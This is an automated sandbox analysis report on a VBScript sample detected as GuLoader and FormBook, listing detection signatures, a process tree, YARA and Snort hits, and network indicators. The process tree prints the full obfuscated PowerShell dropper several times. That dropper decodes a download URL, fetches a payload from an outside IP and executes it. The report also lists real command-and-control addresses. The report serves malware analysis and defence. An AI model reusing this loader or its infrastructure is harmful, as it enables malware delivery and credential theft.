Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pedido02304024.vbs

Overview

General Information

Sample name:Pedido02304024.vbs
Analysis ID:1430738
MD5:01fcc44530ca64a9bd6ea11bdd55f48a
SHA1:8114d39d9c4691782f60affe1116dabc2cd52a96
SHA256:fbf530e626999d7d6b6756f91ced542d15801f98c4e1caffcaccdabdec281d83
Tags:vbs
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7424 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7688 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7748 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7832 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8156 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • NJtMZOnjgWDVLdkRCPxthGxX.exe (PID: 5332 cmdline: "C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • AtBroker.exe (PID: 5016 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
              • NJtMZOnjgWDVLdkRCPxthGxX.exe (PID: 5164 cmdline: "C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 7908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 7452 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 1432 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 7500 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b720:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1547f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.2012139926.0000000008E80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2b720:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1547f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_7556.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf17e:$b2: ::FromBase64String(
        • 0xc51e:$s1: -join
        • 0x5cca:$s4: +=
        • 0x5d8c:$s4: +=
        • 0x9fb3:$s4: +=
        • 0xc0d0:$s4: +=
        • 0xc3ba:$s4: +=
        • 0xc500:$s4: +=
        • 0xe74e:$s4: +=
        • 0xe7ce:$s4: +=
        • 0xe894:$s4: +=
        • 0xe914:$s4: +=
        • 0xeaea:$s4: +=
        • 0xeb6e:$s4: +=
        • 0xcc37:$e4: Get-WmiObject
        • 0xce26:$e4: Get-Process
        • 0xce7e:$e4: Start-Process
        amsi32_7748.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf0e5:$b2: ::FromBase64String(
        • 0xc51e:$s1: -join
        • 0x5cca:$s4: +=
        • 0x5d8c:$s4: +=
        • 0x9fb3:$s4: +=
        • 0xc0d0:$s4: +=
        • 0xc3ba:$s4: +=
        • 0xc500:$s4: +=
        • 0xe74e:$s4: +=
        • 0xe7ce:$s4: +=
        • 0xe894:$s4: +=
        • 0xe914:$s4: +=
        • 0xeaea:$s4: +=
        • 0xeb6e:$s4: +=
        • 0xcc37:$e4: Get-WmiObject
        • 0xce26:$e4: Get-Process
        • 0xce7e:$e4: Start-Process
        • 0x16290:$e4: Get-Process

        System Summary

        barindex
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs", ProcessId: 7424, ProcessName: wscript.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe" , CommandLine: "C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe, NewProcessName: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe, OriginalFileName: C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8156, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe" , ProcessId: 5332, ProcessName: NJtMZOnjgWDVLdkRCPxthGxX.exe
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\AtBroker.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UX0H5LZH3DGH
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs", ProcessId: 7424, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m
        Timestamp:04/24/24-06:36:12.028461
        SID:2855465
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-06:36:58.269227
        SID:2855464
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-06:36:55.590217
        SID:2855464
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:04/24/24-06:37:03.643573
        SID:2855465
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: www.tyaer.comVirustotal: Detection: 10%Perma Link
        Source: www.oyoing.comVirustotal: Detection: 9%Perma Link
        Source: http://87.121.105.163Virustotal: Detection: 18%Perma Link
        Source: http://87.121.105.163/fBizb192.binVirustotal: Detection: 18%Perma Link
        Source: Yara matchFile source: 00000009.00000002.2260878496.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945407561.0000000000860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.2286239677.0000000023700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2945907117.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2945047764.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2944308343.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2945916928.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbOx source: powershell.exe, 00000004.00000002.2007607126.0000000007B65000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000004.00000002.2011727696.0000000008C4C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2007607126.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb08055DA94 source: powershell.exe, 00000004.00000002.2011727696.0000000008C40000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb35 source: powershell.exe, 00000004.00000002.2007607126.0000000007B47000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, AtBroker.exe
        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2011727696.0000000008C4C000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DD1C0 FindFirstFileW,FindNextFileW,FindClose,11_2_004DD1C0

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then pop ebx11_2_004D3070
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then xor eax, eax11_2_004CAE40
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then pop ebx11_2_004D306F

        Networking

        barindex
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49739 -> 47.91.88.207:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 172.67.152.117:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 172.67.152.117:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 172.67.152.117:80
        Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
        Source: Joe Sandbox ViewIP Address: 47.91.88.207 47.91.88.207
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
